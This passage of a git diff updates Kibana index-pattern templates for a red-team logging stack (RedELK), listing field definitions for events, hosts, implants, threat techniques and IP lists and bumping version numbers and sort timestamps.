":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.outcome\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score_norm\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.sequence\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.severity\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.timezone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.directory_local\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.path\"}}},{\"count\":0,\"name\":\"file.path_local\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path_local.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.path_local\"}}},{\"count\":0,\"name\":\"file.size\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.architecture\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.domain_ext\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.as.organization.number\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip_ext\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip_int\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.build\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.codename\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.full\"}}},{\"count\":0,\"name\":\"host.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.name\"}}},{\"count\":0,\"name\":\"host.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.arch\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.checkin\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"implant.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.input\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"implant.link_mode\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.linked\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.log_file\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.output\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"implant.parent_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.sleep\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.task\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"infra.log_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"input.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"ioc.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.file.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.flags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.level\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.logger\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.offset\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.line\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.function\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.source.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.facility.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.facility.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.priority\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"process.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.name\"}}},{\"count\":0,\"name\":\"process.pid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"screenshot.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"screenshot.thumb\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.framework\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"threat.technique.name\"}}},{\"count\":0,\"name\":\"threat.technique.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user.name\"}}}]", "title": "implantsdb"}, "coreMigrationVersion": "7.16.3", "id": "implantsdb", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1645363332328, 1314], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redelk-iplist.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redelk-iplist.ndjson index 8168a1b5..28673cb4 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redelk-iplist.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redelk-iplist.ndjson @@ -1 +1 @@ -{"attributes": {"fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.comments\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.ip\",\"type\":\"unknown\",\"esTypes\":[\"ip_range\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.source\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"module.last_run.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true}]", "timeFieldName": "@timestamp", "title": "redelk-iplist-*"}, "coreMigrationVersion": "7.16.2", "id": "789bb360-2ab1-11eb-bc47-53169c986c81", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642152845450, 1832], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.comments\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.ip\",\"type\":\"unknown\",\"esTypes\":[\"ip_range\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.source\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"module.last_run.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true}]", "timeFieldName": "@timestamp", "title": "redelk-iplist-*"}, "coreMigrationVersion": "7.16.3", "id": "789bb360-2ab1-11eb-bc47-53169c986c81", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1645363335484, 1309], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redelk.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redelk.ndjson index e89e95c6..352d57cd 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redelk.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redelk.ndjson @@ -1 +1 @@ -{"attributes": {"fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.comments\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.ip\",\"type\":\"unknown\",\"esTypes\":[\"ip_range\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\"